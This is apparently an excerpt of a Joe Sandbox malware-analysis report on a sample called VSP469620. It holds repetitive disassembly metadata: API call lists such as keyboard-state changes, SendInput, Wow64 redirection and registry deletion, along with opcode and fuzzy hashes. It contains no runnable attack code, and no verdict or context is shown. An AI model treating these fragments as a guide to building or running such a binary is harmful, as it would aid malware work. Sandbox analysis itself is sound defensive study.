                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 2574300362-2819208100
                                                              • Opcode ID: 86bebbac2e66d7badc79f38d587a77b600b02e47d4a34d3c6ed64933e2af52a9
                                                              • Instruction ID: 265d96fe30cc92ae20e5b21d8b24f9943d6899e22a87dd2e38fbb9ad5595b7e6
                                                              • Opcode Fuzzy Hash: 86bebbac2e66d7badc79f38d587a77b600b02e47d4a34d3c6ed64933e2af52a9
                                                              • Instruction Fuzzy Hash: 38E099706A8300EBDA206F60ED09B093AA8B720702F600466F20EF75B0CFF99490DB14
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: a8a8c8733b754491a69f2b7e89a961fa14143ad19b926abd40e875366e98492d
                                                              • Instruction ID: d2f320328bfd320a24d3bbb8a25bfb578be090047cde1c6e1ebe69c4966bd679
                                                              • Opcode Fuzzy Hash: a8a8c8733b754491a69f2b7e89a961fa14143ad19b926abd40e875366e98492d
                                                              • Instruction Fuzzy Hash: B8E01271804A28EBCB119750ED85DFAB3FCEB04741F2004D2F90EA2514D7359B94AA12
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00AB42EC,?,00AB42AA,?), ref: 00AB4304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: cfef3d10a78cc2746ce6c60912af456c73febbbb46f06d73c532899411646f9f
                                                              • Instruction ID: 576069618bcd02269472f0ec1af854939b463683ed5f4cde35787f8e5dab99c1
                                                              • Opcode Fuzzy Hash: cfef3d10a78cc2746ce6c60912af456c73febbbb46f06d73c532899411646f9f
                                                              • Instruction Fuzzy Hash: 7ED0A930900F12AFD7204F20F80C78676E8BB08701B24846AE882E32B2EBB4CC808A50
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B121FB,?,00B123EF), ref: 00B12213
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00B12225
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetProcessId$kernel32.dll
                                                              • API String ID: 2574300362-399901964
                                                              • Opcode ID: dd748957eb15aad65092ca6f6833f75c05774dba719e0e18fc4dd71cfc2db0be
                                                              • Instruction ID: 08bc11115f3237f40269769b50c8ecfe08b837b0e3bf333a55745ff37bf77df7
                                                              • Opcode Fuzzy Hash: dd748957eb15aad65092ca6f6833f75c05774dba719e0e18fc4dd71cfc2db0be
                                                              • Instruction Fuzzy Hash: CCD0A734500F129FD7214F30F80874976D4EB09304B1044AAE842F3160DB74D8C08690
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00AB41BB,00AB4341,?,00AB422F,?,00AB41BB,?,?,?,?,00AB39FE,?,00000001), ref: 00AB4359
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB436B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 84a0d72f0929ac9f894d20ed95f1fc18874ba97b09bc27d8bb122f0dafe7d08f
                                                              • Instruction ID: ccc5e9157a9cc0fe0e2b176697cd468fc85cbfe605fcf3770ad4eb7ce4b82bff
                                                              • Opcode Fuzzy Hash: 84a0d72f0929ac9f894d20ed95f1fc18874ba97b09bc27d8bb122f0dafe7d08f
                                                              • Instruction Fuzzy Hash: 64D0A730500B229FD7604F30F808B4576D8AB18715B14446AE482E3162DBB4D8808A50
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,00AF051D,?,00AF05FE), ref: 00AF0547
                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AF0559
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1071820185
                                                              • Opcode ID: 9a11d923a9c6865c498bf831a2a146fc4df9573c351a200c2836a0fc1c5de5f7
                                                              • Instruction ID: ba691da260038da1249edf489cace055cbc978a24bb62afa5e1476ea2690f41b
                                                              • Opcode Fuzzy Hash: 9a11d923a9c6865c498bf831a2a146fc4df9573c351a200c2836a0fc1c5de5f7
                                                              • Instruction Fuzzy Hash: CAD0A730500F129FD7208F60F808B1576E4AB10301B20C45DF546E3161DBF4C8808E50
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00AF052F,?,00AF06D7), ref: 00AF0572
                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00AF0584
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1587604923
                                                              • Opcode ID: de1586ae6ea178d526a9aeda352dabbb8186f547f004f83509ea9df09a180551
                                                              • Instruction ID: fa8382466fef1fd81db5a1cfb946b4bd1c6eb59aefe6e4200e458c9d1167ec78
                                                              • Opcode Fuzzy Hash: de1586ae6ea178d526a9aeda352dabbb8186f547f004f83509ea9df09a180551
                                                              • Instruction Fuzzy Hash: F4D05E30500B129BD7205F60B808B1677E4AB04301F208459F941E2160DAB4D4848A60
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B0ECBE,?,00B0EBBB), ref: 00B0ECD6
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B0ECE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              • Opcode ID: 17bb4d6faf74cf6ab0c6fae3bde4e4789540b1b3c4572caa25e89419a81c7351
                                                              • Instruction ID: f7daea3bc7d5aef63925e8e63f6be27b39ba9a7e0546f9444c164d74327fbe06
                                                              • Opcode Fuzzy Hash: 17bb4d6faf74cf6ab0c6fae3bde4e4789540b1b3c4572caa25e89419a81c7351
                                                              • Instruction Fuzzy Hash: 24D0C770501F23DFEB305F65F8497467BE4EB04751B1488AAF855E32A1DF75D8809650
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B0BAD3,00000001,00B0B6EE,?,00B4DC00), ref: 00B0BAEB
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B0BAFD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: cee8675f1fb8f06baa181b32f425bb05e436c07439db448fdc4cd55609fe597d
                                                              • Instruction ID: 19efb75fb33ffa2f7d1a8b861c7542a85000f00f14f6b5d54bb0ec4954b501d4
                                                              • Opcode Fuzzy Hash: cee8675f1fb8f06baa181b32f425bb05e436c07439db448fdc4cd55609fe597d
                                                              • Instruction Fuzzy Hash: C9D0C770914F129FDB305F65F888F557BD4EB05751B1044AAE857E31A4DBB4D890CA50
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00B13BD1,?,00B13E06), ref: 00B13BE9
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B13BFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: f13467dd8460e2c5e34a6608c3af4b2a1409326f66b74dca06cbd8bd0084c523
                                                              • Instruction ID: fb8e830ca2ffddfdeec85006cfdb2cc48b8741396fe8315ba08e9f507f10254e
                                                              • Opcode Fuzzy Hash: f13467dd8460e2c5e34a6608c3af4b2a1409326f66b74dca06cbd8bd0084c523
                                                              • Instruction Fuzzy Hash: 59D0C774500F529FD7205F65F808747FAF4EB05715B2044D9E456F3160EBB4D4C48E90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2c32f1c61971db0e06beb9eaff6033021f1493463ab0bcac3b77fb78329f5a2
                                                              • Instruction ID: 3b5c9acc67c356adad46303c15154a6dd261ec1c10979c6cfef724d07dcf0a97
                                                              • Opcode Fuzzy Hash: d2c32f1c61971db0e06beb9eaff6033021f1493463ab0bcac3b77fb78329f5a2
                                                              • Instruction Fuzzy Hash: 97C13B75A0035AEFDB14DFA5C984AAFB7B5FF88700F208598E905AB251D730EE41DB90
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 00B0AAB4
                                                              • CoUninitialize.OLE32 ref: 00B0AABF
                                                                • Part of subcall function 00AF0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AF027B
                                                              • VariantInit.OLEAUT32(?), ref: 00B0AACA
                                                              • VariantClear.OLEAUT32(?), ref: 00B0AD9D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: d0c9423d4ce0e8d123feb647d0471c0d0282eb9d92f9226e5520bcbe56857aca
                                                              • Instruction ID: b71079895330ee0983e776961b26353a162a6e618d994f76f0be2dc558a7785f
                                                              • Opcode Fuzzy Hash: d0c9423d4ce0e8d123feb647d0471c0d0282eb9d92f9226e5520bcbe56857aca
                                                              • Instruction Fuzzy Hash: C8A126352047019FDB10DF14C991B5ABBE9FF89710F158999FA969B3A2CB30ED04CB86
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 37b1c2943d525dcd1065f34a5e26346ab5913d4ea1fd998f9be7fadcbbd76252
                                                              • Instruction ID: ee517ad29dbf25dfa11cec7a79e5ecf913bf16745cfd2eac29dc8d38769c3d53
                                                              • Opcode Fuzzy Hash: 37b1c2943d525dcd1065f34a5e26346ab5913d4ea1fd998f9be7fadcbbd76252
                                                              • Instruction Fuzzy Hash: 79517F30604787ABDB24AF6BD595AAFB3E9EF45310F30981FE556CB2D2DB7098808705
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3877424927-0
                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction ID: 7a5ee04c034970ad22617976a8b76024e0c65c8d8d371dd19adf899b50c0697a
                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction Fuzzy Hash: 0C51C1B2A00605ABCF24DF6989846AE77B1AF40320F24862BF837963D0D774DF50DB52
                                                              APIs
                                                              • GetWindowRect.USER32(00C96758,?), ref: 00B1C544
                                                              • ScreenToClient.USER32(?,00000002), ref: 00B1C574
                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00B1C5DA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: ce8319aeb26379c356cd3f4de0ca4e09ccb3ece9d7a659233ccd4a3a2d383696
                                                              • Instruction ID: 09e1ac3ea5aebcffcc143cbf5ef61b619aa657b8f89964535150a9dc16eb65d4
                                                              • Opcode Fuzzy Hash: ce8319aeb26379c356cd3f4de0ca4e09ccb3ece9d7a659233ccd4a3a2d383696
                                                              • Instruction Fuzzy Hash: D5514E75900204EFCF10DF68D881AEE7BF6EB55720F608699F9699B291D730ED81CB90
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AEC462
                                                              • __itow.LIBCMT ref: 00AEC49C
                                                                • Part of subcall function 00AEC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00AEC753
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00AEC505
                                                              • __itow.LIBCMT ref: 00AEC55A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 5c803a4939c9a5e955e1df100f9e8b53a9273554d0eebf670e497e2e313482f3
                                                              • Instruction ID: c03163f8f84ceb07a2c5708aa84e24d695e430244603bd696b48aec6276afde7
                                                              • Opcode Fuzzy Hash: 5c803a4939c9a5e955e1df100f9e8b53a9273554d0eebf670e497e2e313482f3
                                                              • Instruction Fuzzy Hash: CA41EA71A006486FDF15EF65D955FEE7BB9AF44710F000019F905A3282DB749A46CB61
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AF3966
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AF3982
                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00AF39EF
                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00AF3A4D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 5481d0fa5f3fdcb25c83b4efb221b697b08122087c648d810a074f50067a3895
                                                              • Instruction ID: 18868372fcf60d2dc9514bed63823d86e073a623c8e141f73ee577e2cbce4160
                                                              • Opcode Fuzzy Hash: 5481d0fa5f3fdcb25c83b4efb221b697b08122087c648d810a074f50067a3895
                                                              • Instruction Fuzzy Hash: 59413772A0020CAAEF309BE5C855BFDBBB9AB55310F14011AF6C1972C1CBF58E84D761
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B1B5D1
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: df6fa615a9ef3574029d618cf7ffbf0abb580f78ba118720eb537f368cd9b63d
                                                              • Instruction ID: 5df48193f93f52b8ca9a13aeb6d1e8c83cfcc2f46872929332784c9b647c3eb8
                                                              • Opcode Fuzzy Hash: df6fa615a9ef3574029d618cf7ffbf0abb580f78ba118720eb537f368cd9b63d
                                                              • Instruction Fuzzy Hash: D731AD74601208ABEF209F18CC95FECB7E6EB26350FA44585FA51D62E1CB30E9D08B61
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 00B1D807
                                                              • GetWindowRect.USER32(?,?), ref: 00B1D87D
                                                              • PtInRect.USER32(?,?,00B1ED5A), ref: 00B1D88D
                                                              • MessageBeep.USER32(00000000), ref: 00B1D8FE
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 94192861d77e18905ba289b2074eda00c415be09ccae3bfe03c993394f22c9cf
                                                              • Instruction ID: 00bb95c7ba6b6c3e4dc1a2ae6d15f29e791c7b9958d94540d0db2e6f100575dc
                                                              • Opcode Fuzzy Hash: 94192861d77e18905ba289b2074eda00c415be09ccae3bfe03c993394f22c9cf
                                                              • Instruction Fuzzy Hash: 9B417974A00218DFCB11DF58D884BE97BF5FB48315F9885E9E8189B2A0D730E981CB50
                                                              APIs
                                                              • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00AF3AB8
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AF3AD4
                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00AF3B34
                                                              • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00AF3B92
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: eafadcd83bfddae396d61ab3205bbb67c4334fa920fdfc36f42d58df658ebf71
                                                              • Instruction ID: ebbfc30805dbdaa8fd70b80e718b737e257f421df52bd4ae7730710ecab03af2
                                                              • Opcode Fuzzy Hash: eafadcd83bfddae396d61ab3205bbb67c4334fa920fdfc36f42d58df658ebf71
                                                              • Instruction Fuzzy Hash: 59316532A0025CAEEF319BE4C829BFEBBB99B55310F14025AF682972D1C7748F45C761
                                                              APIs
